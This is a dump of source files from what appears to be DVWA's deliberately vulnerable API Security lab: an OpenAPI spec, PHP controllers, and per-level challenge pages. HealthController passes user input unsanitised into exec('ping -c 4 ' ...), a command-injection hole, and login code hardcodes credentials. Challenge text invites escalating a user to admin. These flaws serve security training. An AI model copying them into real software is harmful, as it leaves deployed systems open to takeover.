'#/components/schemas/UserUpdate'\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/User'\n '404':\n description: 'User not found'\n '422':\n description: 'Invalid user object provided'\n delete:\n tags:\n - user\n description: 'Delete user by ID.'\n operationId: deleteUserById\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n responses:\n '200':\n description: 'Successful operation.'\n '404':\n description: 'User not found'\n /vulnerabilities/api/v2/user/:\n get:\n tags:\n - user\n description: 'Get all users.'\n operationId: getUsers\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n type: array\n items:\n $ref: '#/components/schemas/User'\n post:\n tags:\n - user\n description: 'Create a new user.'\n operationId: addUser\n requestBody:\n description: 'User data.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/UserAdd'\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/User'\n '422':\n description: 'Invalid user object provided'\ncomponents:\n schemas:\n Target:\n required:\n - target\n properties:\n target:\n type: string\n example: digi.ninja\n type: object\n Words:\n required:\n - words\n properties:\n words:\n type: string\n example: 'Hello World'\n type: object\n Credentials:\n required:\n - username\n - password\n properties:\n username:\n type: string\n example: user\n password:\n type: string\n example: password\n type: object\n Order:\n properties:\n id:\n type: integer\n example: 1\n name:\n type: string\n example: 'Tony Hart'\n address:\n type: string\n example: 'BBC Television Centre, London W3 6XZ'\n items:\n type: string\n example: '1 * brush, 2 * paints, 1 * easel'\n status:\n type: integer\n example: 1\n type: object\n OrderAdd:\n required:\n - level\n - name\n properties:\n name:\n type: string\n example: fred\n address:\n type: string\n example: '1 High Street, Atown'\n items:\n type: string\n example: '2 * brushes'\n type: object\n OrderUpdate:\n properties:\n name:\n type: string\n example: fred\n address:\n type: string\n example: '1 High Street, Atown'\n items:\n type: string\n example: '2 * brushes'\n type: object\n Token:\n required:\n - token\n properties:\n token:\n type: string\n example: '11111'\n type: object\n User:\n properties:\n id:\n type: integer\n example: 1\n name:\n type: string\n example: fred\n level:\n type: integer\n example: 1\n type: object\n UserAdd:\n required:\n - level\n - name\n properties:\n name:\n type: string\n example: fred\n level:\n type: integer\n example: 1\n type: object\n UserUpdate:\n required:\n - name\n properties:\n name:\n type: string\n example: fred\n type: object\n securitySchemes:\n http:\n type: http\n name: authorization\ntags:\n -\n name: user\n description: 'User operations.'\n -\n name: health\n description: 'Health operations.'\n -\n name: order\n description: 'Order operations.'\n -\n name: login\n description: 'Login operations.'\n"
},
{
"path": "vulnerabilities/api/public/index.php",
"content": " $dir) {\n\tif ($dir == \"order\" || $dir == \"user\" || $dir == \"health\" || $dir == \"login\") {\n\t\t$local_uri = array_slice ($uri, $pos - 1);\n\t\tbreak;\n\t}\n}\n\n// All of our endpoints start with /api/v[0-9]\n// everything else results in a 404 Not Found\n\nif (count($local_uri) < 2) {\n\theader(\"HTTP/1.1 404 Not Found\");\n\texit();\n}\n\n$requestMethod = $_SERVER[\"REQUEST_METHOD\"];\n\n$version = $local_uri[0];\n\nif (preg_match (\"/v([0-9]*)/\", $version, $matches)) {\n\t$version = intval ($matches[1]);\n} else {\n\theader(\"HTTP/1.1 404 Not Found\");\n\texit();\n}\n$controller = $local_uri[1];\n\nswitch ($controller) {\n\tcase \"order\":\n\t\t// the user id is, of course, optional and must be a number:\n\t\t$orderId = null;\n\t\tif (isset($local_uri[2]) && $local_uri[2] != \"\") {\n\t\t\t$orderId = intval($local_uri[2]);\n\t\t}\n\n\t\t// pass the request method and order ID to the OrderController and process the HTTP request:\n\t\t$controller = new OrderController($requestMethod, $version, $orderId);\n\t\t$controller->processRequest();\n\t\tbreak;\n\tcase \"user\":\n\t\t// the user id is, of course, optional and must be a number:\n\t\t$userId = null;\n\t\tif (isset($local_uri[2])) {\n\t\t\t$userId = (int) $local_uri[2];\n\t\t}\n\n\t\t// pass the request method and user ID to the UserController and process the HTTP request:\n\t\t$controller = new UserController($requestMethod, $version, $userId);\n\t\t$controller->processRequest();\n\t\tbreak;\n\tcase \"health\":\n\t\tif (!isset($local_uri[2])) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\tbreak;\n\t\t}\n\n\t\t$command = $local_uri[2];\n\t\t$controller = new HealthController($requestMethod, $version, $command);\n\t\t$controller->processRequest();\n\t\tbreak;\n\tcase \"login\":\n\t\tif (!isset($local_uri[2])) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\tbreak;\n\t\t}\n\n\t\t$command = $local_uri[2];\n\t\t$controller = new LoginController($requestMethod, $version, $command);\n\t\t$controller->processRequest();\n\t\tbreak;\n\tdefault:\n\t\t$gc = new GenericController(\"notFound\");\n\t\t$gc->processRequest();\n\t\tbreak;\n}\n"
},
{
"path": "vulnerabilities/api/source/high.php",
"content": "\n\t\tHere is the OpenAPI document, have a look the health functions and see if you can find one that has a vulnerability.\n\t\n\tVulnerability: API Security
\n\n\t\n\";\n\n$page[ 'body' ] .= \"\n\t\t{$html}\n\t
\n\n\tMore Information
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/12-API_Testing/00-API_Testing_Overview', \"OWASP WSTG API Testing Overview\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c', \"Burp OpenAPI Parser\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.zaproxy.org/docs/desktop/addons/openapi-support/', \"ZAP OpenAPI Support\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://swagger.io/tools/swagger-ui/', \"Swagger UI\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.postman.com/', \"Postman\" ) . \" \n\t
\n\t\tNote, this file assumes you are running DVWA out of the document root, if you have installed it into a subdirectory, such as DVWA, then you will need to update it. Look through the file for the paths, e.g.
\n\t\t/vulnerabilities/api/v2/health/echo
\n\t\tand prepend your directory, so if you are in the DVWA directory you would change it to
\n\t\t/DVWA/vulnerabilities/api/v2/health/echo\n\t
\n\t\tYou might be able to work out how to call the individual functions by hand, but it would be a lot easier to import it into an application such as Swagger UI, Burp, ZAP, or Postman and let the tool do the hard work of setting the requests up for you.\n\t
\n\";\n\n?>\n" }, { "path": "vulnerabilities/api/source/impossible.php", "content": "\n\t\tRather than try to develop a perfect API, there is a different type of challenge for this level.\n\t\n\t\n\t\tThe order system uses OAuth 2.0 for authentication. Being able to automate using this in your tools will greatly help with efficiency, removing the need to manually login and copy access tokens around. Use this level to practice setting up OAuth 2.0 in your testing tool of choice, for me this is Postman which is then proxied through Burp, but you can pick whatever tools are most appropriate for your testing environment.\n\t
\n\t\n\t\tHere are some guides that might help:\n
\n\n\n\";\n\n?>\n" }, { "path": "vulnerabilities/api/source/low.php", "content": "\n\tVersioning is important in APIs, running multiple versions of an API can allow for backward compatibility and can allow new services to be added without affecting existing users. The downside to keeping old versions alive is when those older versions contain vulnerabilities.\n\n\";\n\n$html .= \"\n\n\";\n\n$html .= \"\n\n\n\t\t\tLook at the call used to create this table and see if you can exploit it to return some additional information.\n\t\t
\n\t\t\n\t\t\n\";\n\n?>\n" }, { "path": "vulnerabilities/api/source/medium.php", "content": "\n\t\tfunction update_username(user_json) {\n\t\t\tconsole.log(user_json);\n\t\t\tvar user_info = document.getElementById ('user_info');\n\t\t\tvar name_input = document.getElementById ('name');\n\n\t\t\tif (user_json.name == '') {\n\t\t\t\tuser_info.innerHTML = 'User details: unknown user';\n\t\t\t\tname_input.value = 'unknown';\n\t\t\t} else {\n\t\t\t\tvar level = 'unknown';\n\t\t\t\tif (user_json.level == 0) {\n\t\t\t\t\tlevel = 'admin';\n\t\t\t\t\tsuccessDiv = document.getElementById ('message');\n\t\t\t\t\tsuccessDiv.style.display = 'block';\n\t\t\t\t} else {\n\t\t\t\t\tlevel = 'user';\n\t\t\t\t}\n\t\t\t\tuser_info.innerHTML = 'User details: ' + user_json.name + ' (' + level + ')';\n\t\t\t\tname_input.value = user_json.name;\n\t\t\t}\n\t\t}\n\n\t\tfunction get_user() {\n\t\t\tconst url = '\" . $stripped_url . \"/vulnerabilities/api/v2/user/2';\n\t\t\t \n\t\t\tfetch(url, { \n\t\t\t\t\tmethod: 'GET',\n\t\t\t\t}) \n\t\t\t\t.then(response => { \n\t\t\t\t\tif (!response.ok) { \n\t\t\t\t\t\tthrow new Error('Network response was not ok'); \n\t\t\t\t} \n\t\t\t\treturn response.json(); \n\t\t\t\t}) \n\t\t\t\t.then(data => { \n\t\t\t\t\tupdate_username (data);\n\t\t\t\t}) \n\t\t\t\t.catch(error => { \n\t\t\t\t\tconsole.error('There was a problem with your fetch operation:', error); \n\t\t\t}); \n\t\t}\n\n\t\tfunction update_name() {\n\t\t\tconst url = '\" . $stripped_url . \"/vulnerabilities/api/v2/user/2';\n\t\t\tconst name = document.getElementById ('name').value;\n\t\t\tconst data = JSON.stringify({name: name});\n\t\t\t \n\t\t\tfetch(url, { \n\t\t\t\t\tmethod: 'PUT', \n\t\t\t\t\theaders: { \n\t\t\t\t\t\t'Content-Type': 'application/json' \n\t\t\t\t\t}, \n\t\t\t\t\tbody: data\n\t\t\t\t}) \n\t\t\t\t.then(response => { \n\t\t\t\t\tif (!response.ok) { \n\t\t\t\t\t\tthrow new Error('Network response was not ok'); \n\t\t\t\t} \n\t\t\t\treturn response.json(); \n\t\t\t\t}) \n\t\t\t\t.then(data => { \n\t\t\t\t\tupdate_username(data);\n\t\t\t\t}) \n\t\t\t\t.catch(error => { \n\t\t\t\t\tconsole.error('There was a problem with your fetch operation:', error); \n\t\t\t}); \n\t\t}\n\t\n\";\n\n$html .= \"\n\t\t\n\t\t\tLook at the call used to update your name and exploit it to elevate your user to admin (level 0).\n\t\t
\n\t\t\n\t\t\n\t\t\n\t\t\n\";\n\n?>\n" }, { "path": "vulnerabilities/api/src/GenericController.php", "content": "command = $command;\n\t}\n\n\tprivate function optionsResponse() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\n private function unprocessableEntityResponse()\n {\n $response['status_code_header'] = 'HTTP/1.1 422 Unprocessable Entity';\n $response['body'] = json_encode([\n 'error' => 'Invalid input'\n ]);\n return $response;\n }\n\n\tprivate function notFoundResponse() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 404 Not Found';\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\t\n\tprivate function methodNotSupported() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 405 Method Not Supported';\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\n\tprivate function teapotResponse() {\n\t\t$response['status_code_header'] = \"HTTP/1.1 418 I'm a teapot\";\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\n\tpublic function processRequest() {\n\t\tswitch ($this->command) {\n\t\t\tcase \"teapot\":\n\t\t\t\t$response = $this->teapotResponse();\n\t\t\t\tbreak;\n\t\t\tcase \"notfound\":\n\t\t\t\t$response = $this->notFoundResponse();\n\t\t\t\tbreak;\n\t\t\tcase \"notSupported\":\n\t\t\t\t$response = $this->methodNotSupported();\n\t\t\t\tbreak;\n\t\t\tcase \"unprocessable\":\n\t\t\t\t$response = $this->unprocessableEntityResponse();\n\t\t\t\tbreak;\n\t\t\tcase \"options\":\n\t\t\t\t$response = $this->optionsResponse();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t$response = $this->notFoundResponse();\n\t\t\t\tbreak;\n\t\t};\n\t\theader($response['status_code_header']);\n\t\tif ($response['body']) {\n\t\t\techo $response['body'];\n\t\t}\n\t\texit();\n\t}\n}\n" }, { "path": "vulnerabilities/api/src/HealthController.php", "content": "requestMethod = $requestMethod;\n\t\t$this->command = $command;\n\t}\n\n #[OAT\\Post(\n\t\ttags: [\"health\"],\n path: '/vulnerabilities/api/v2/health/echo',\n operationId: 'echo',\n\t\tdescription: 'Echo, echo, cho, cho, o o ....',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'Your words.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: Words::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n ]\n ) \n ]\n\t\n\tprivate function echo() {\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (array_key_exists (\"words\", $input)) {\n\t\t\t$words = $input['words'];\n\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t$response['body'] = json_encode (array (\"reply\" => $words));\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Words not specified\"));\n\t\t}\n\t\treturn $response;\n\t}\n\n #[OAT\\Post(\n\t\ttags: [\"health\"],\n path: '/vulnerabilities/api/v2/health/connectivity',\n operationId: 'checkConnectivity',\n\t\tdescription: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'Remote host.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: Target::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n ]\n ) \n ]\n\t\n\tprivate function checkConnectivity() {\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (array_key_exists (\"target\", $input)) {\n\t\t\t$target = $input['target'];\n\n\t\t\texec (\"ping -c 4 \" . $target, $output, $ret_var);\n\n\t\t\tif ($ret_var == 0) {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"OK\"));\n\t\t\t} else {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Connection failed\"));\n\t\t\t}\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Target not specified\"));\n\t\t}\n\t\treturn $response;\n\t}\n\n #[OAT\\Get(\n\t\ttags: [\"health\"],\n path: '/vulnerabilities/api/v2/health/status',\n operationId: 'getHealthStatus',\n\t\tdescription: 'Get the health of the system.',\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n ]\n ) \n ]\n\t\n\tprivate function getStatus() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode (array (\"status\" => \"OK\"));\n\t\treturn $response;\n\t}\n\n #[OAT\\Get(\n\t\ttags: [\"health\"],\n path: '/vulnerabilities/api/v2/health/ping',\n operationId: 'ping',\n\t\tdescription: 'Simple ping/pong to check connectivity.',\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n ]\n ) \n ]\n\tprivate function ping() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode (array (\"Ping\" => \"Pong\"));\n\t\treturn $response;\n\t}\n\n\tpublic function processRequest() {\n\t\tswitch ($this->requestMethod) {\n\t\t\tcase 'POST':\n\t\t\t\tswitch ($this->command) {\n\t\t\t\t\tcase \"echo\":\n\t\t\t\t\t\t$response = $this->echo();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"connectivity\":\n\t\t\t\t\t\t$response = $this->checkConnectivity();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t\t\t\t$gc->processRequest();\n\t\t\t\t\t\texit();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase 'GET':\n\t\t\t\tswitch ($this->command) {\n\t\t\t\t\tcase \"status\":\n\t\t\t\t\t\t$response = $this->getStatus();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"ping\":\n\t\t\t\t\t\t$response = $this->ping();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t\t\t\t$gc->processRequest();\n\t\t\t\t\t\texit();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase 'OPTIONS':\n\t\t\t\t$gc = new GenericController(\"options\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t$gc = new GenericController(\"notSupported\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t}\n\t\theader($response['status_code_header']);\n\t\tif ($response['body']) {\n\t\t\techo $response['body'];\n\t\t}\n\t}\n}\n\n#[OAT\\Schema(required: ['target'])]\nfinal class Target {\n #[OAT\\Property(example: \"digi.ninja\")]\n public string $target;\n}\n\n#[OAT\\Schema(required: ['words'])]\nfinal class Words {\n #[OAT\\Property(example: \"Hello World\")]\n public string $words;\n}\n\n" }, { "path": "vulnerabilities/api/src/Helpers.php", "content": " \"Invalid content type, expected JSON\"));\n\t\t\treturn $response;\n\t\t}\n\t}\n}\n" }, { "path": "vulnerabilities/api/src/Login.php", "content": " $tokenObj->create_token(self::ACCESS_TOKEN_SECRET, $now + self::ACCESS_TOKEN_LIFE),\n\t\t\t\"refresh_token\" => $tokenObj->create_token(self::REFRESH_TOKEN_SECRET, $now + self::REFRESH_TOKEN_LIFE),\n\t\t\t\"token_type\" => \"bearer\",\n\t\t\t\"expires_in\" => self::ACCESS_TOKEN_LIFE)\n\t\t);\n\t\treturn $token;\n\t}\n\n\tpublic static function check_access_token($token) {\n\t\t$tokenObj = new Token();\n\t\t$decrypted = $tokenObj->decrypt_token ($token);\n\n\t\tif ($decrypted === false) {\n\t\t\treturn false;\n\t\t}\n\t\tif ($decrypted['secret'] == self::ACCESS_TOKEN_SECRET && $decrypted['expires'] > time()) {\n\t\t\treturn true;\n\t\t}\n\t\treturn false;\n\t}\n\n\tpublic static function check_refresh_token($token) {\n\t\t$tokenObj = new Token();\n\t\t$decrypted = $tokenObj->decrypt_token ($token);\n\n\t\tif ($decrypted['secret'] == self::REFRESH_TOKEN_SECRET && $decrypted['expires'] > time()) {\n\t\t\treturn true;\n\t\t}\n\t\treturn false;\n\t}\n}\n" }, { "path": "vulnerabilities/api/src/LoginController.php", "content": "requestMethod = $requestMethod;\n\t\t$this->command = $command;\n\t}\n\n\t#\n\t# Add one of these for refresh\n\t#\n #[OAT\\Post(\n\t\ttags: [\"login\"],\n path: '/vulnerabilities/api/v2/login/login',\n operationId: 'login',\n\t\tdescription: 'Login as user.',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'The login credentials.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: Credentials::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n new OAT\\Response(\n response: 401,\n description: 'Invalid credentials.',\n ),\n ]\n ) \n ]\n\n\tprivate function loginJSON() {\n\t\t$ret = Helpers::check_content_type();\n\t\tif ($ret !== true) {\n\t\t\treturn $ret;\n\t\t}\n\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (array_key_exists (\"username\", $input) && \n\t\t\tarray_key_exists (\"password\", $input)) {\n\t\t\t$username = $input['username'];\n\t\t\t$password = $input['password'];\n\n\t\t\tif ($username == \"mrbennett\" && $password == \"becareful\") {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t$response['body'] = json_encode (array (\"token\" => Login::create_token()));\n\t\t\t} else {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid credentials\"));\n\t\t\t}\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing credentials\"));\n\t\t}\n\t\treturn $response;\n\t}\n\n\t# This is an attempt at an OAUTH2 client password authentication flow\n\tprivate function login() {\n\t\t# Default fail, just in case.\n\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t$response['body'] = json_encode (array (\"status\" => \"Authentication failed\"));\n\n\t\tif (array_key_exists (\"PHP_AUTH_USER\", $_SERVER) && \n\t\t\tarray_key_exists (\"PHP_AUTH_PW\", $_SERVER)) {\n\t\t\t$client_id = $_SERVER['PHP_AUTH_USER'];\n\t\t\t$client_secret = $_SERVER['PHP_AUTH_PW'];\n\n\t\t\t# App auth check\n\t\t\tif ($client_id == \"1471.dvwa.digi.ninja\" && $client_secret == \"ABigLongSecret\") {\n\n\t\t\t\tif (array_key_exists (\"grant_type\", $_POST)) {\n\t\t\t\t\tswitch ($_POST['grant_type']) {\n\t\t\t\t\t\tcase \"password\":\n\t\t\t\t\t\t\tif (array_key_exists (\"username\", $_POST) && \n\t\t\t\t\t\t\t\tarray_key_exists (\"password\", $_POST)) {\n\t\t\t\t\t\t\t\t$username = $_POST['username'];\n\t\t\t\t\t\t\t\t$password = $_POST['password'];\n\n\t\t\t\t\t\t\t\tif ($username == \"mrbennett\" && $password == \"becareful\") {\n\t\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t\t\t\t\t\t$response['body'] = Login::create_token();\n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid user credentials\"));\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing user credentials\"));\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase \"refresh_token\":\n\t\t\t\t\t\t\tif (array_key_exists (\"refresh_token\", $_POST)) {\n\t\t\t\t\t\t\t\t$refresh_token = $_POST['refresh_token'];\n\n\t\t\t\t\t\t\t\t# Because this is sent in a POST body, any + characters\n\t\t\t\t\t\t\t\t# get replaced by a space when the URL decode happens. This\n\t\t\t\t\t\t\t\t# puts them back to plus characters.\n\t\t\t\t\t\t\t\t$ref = str_replace (\" \", \"+\", $refresh_token);\n\n\t\t\t\t\t\t\t\tif (Login::check_refresh_token($ref)) {\n\t\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t\t\t\t\t\t$response['body'] = Login::create_token();\n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid refresh token\"));\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing refresh token\"));\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Unknown grant type\"));\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing grant type\"));\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid clientid/clientsecret credentials\"));\n\t\t\t}\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing clientid/clientsecret credentials\"));\n\t\t}\n\n\t\treturn $response;\n\t}\n\n\tprivate function refresh() {\n\t/*\n echo \"Hello {$_SERVER['PHP_AUTH_USER']}.
\";\n echo \"You entered {$_SERVER['PHP_AUTH_PW']} as your password.
\";\n\t*/\n\t\t$ret = Helpers::check_content_type();\n\t\tif ($ret !== true) {\n\t\t\treturn $ret;\n\t\t}\n\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (array_key_exists (\"refresh_token\", $input)) {\n\t\t\tif (array_key_exists (\"grant_type\", $input)) {\n\t\t\t\t$token = $input['token'];\n\t\t\t\tif (Login::check_access_token($token)) {\n\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t\t$response['body'] = json_encode (array (\"token\" => \"Valid\"));\n\t\t\t\t} else {\n\t\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid\"));\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing token\"));\n\t\t\t}\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing token\"));\n\t\t}\n\t\treturn $response;\n\t}\n\n #[OAT\\Post(\n\t\ttags: [\"login\"],\n path: '/vulnerabilities/api/v2/login/check_token',\n operationId: 'check_token',\n\t\tdescription: 'Check a token is valid.',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'The token to test.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: Token::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n new OAT\\Response(\n response: 401,\n description: 'Token is invalid.',\n ),\n ]\n ) \n ]\n\t\n\tprivate function check_token() {\n\t\t$ret = Helpers::check_content_type();\n\t\tif ($ret !== true) {\n\t\t\treturn $ret;\n\t\t}\n\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (array_key_exists (\"token\", $input)) {\n\t\t\t$token = $input['token'];\n\t\t\tif (Login::check_access_token($token)) {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t\t\t$response['body'] = json_encode (array (\"token\" => \"Valid\"));\n\t\t\t} else {\n\t\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid\"));\n\t\t\t}\n\t\t} else {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Missing token\"));\n\t\t}\n\t\treturn $response;\n\t}\n\n\tpublic function processRequest() {\n\t\tswitch ($this->requestMethod) {\n\t\t\tcase 'POST':\n\t\t\t\tswitch ($this->command) {\n\t\t\t\t\tcase \"refresh\":\n\t\t\t\t\t\t$response = $this->login();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"login\":\n\t\t\t\t\t\t$response = $this->login();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"check_token\":\n\t\t\t\t\t\t$response = $this->check_token();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t\t\t\t$gc->processRequest();\n\t\t\t\t\t\texit();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase 'OPTIONS':\n\t\t\t\t$gc = new GenericController(\"options\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t$gc = new GenericController(\"notSupported\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t}\n\t\theader($response['status_code_header']);\n\t\tif ($response['body']) {\n\t\t\techo $response['body'];\n\t\t}\n\t}\n}\n\n#[OAT\\Schema(required: ['username', 'password'])]\nfinal class Credentials {\n #[OAT\\Property(example: \"user\")]\n public string $username;\n #[OAT\\Property(example: \"password\")]\n public string $password;\n}\n\n/*\nMoving this to its own thing\n#[OAT\\Schema(required: ['token'])]\nfinal class Token {\n #[OAT\\Property(example: \"11111\")]\n public string $token;\n}\n*/\n" }, { "path": "vulnerabilities/api/src/Order.php", "content": "id = $id;\n\t\t$this->name = $name;\n\t\t$this->address = $address;\n\t\t$this->items = $items;\n\t\t$this->status = $status;\n\t}\n\n\tpublic function toArray($version) {\n\t\t$a = array (\n\t\t\t\"id\" => $this->id,\n\t\t\t\"name\" => $this->name,\n\t\t\t\"address\" => $this->address,\n\t\t\t\"items\" => $this->items,\n\t\t\t\"status\" => $this->status,\n\t\t);\n\n\t\treturn $a;\n\t}\n}\n\n#[OAT\\Schema(required: ['level', 'name'])]\nfinal class OrderAdd\n{\n #[OAT\\Property(example: \"fred\")]\n public string $name;\n\n #[OAT\\Property(example: \"1 High Street, Atown\")]\n public string $address;\n\n #[OAT\\Property(example: \"2 * brushes\")]\n public string $items;\n}\n\n#[OAT\\Schema()]\nfinal class 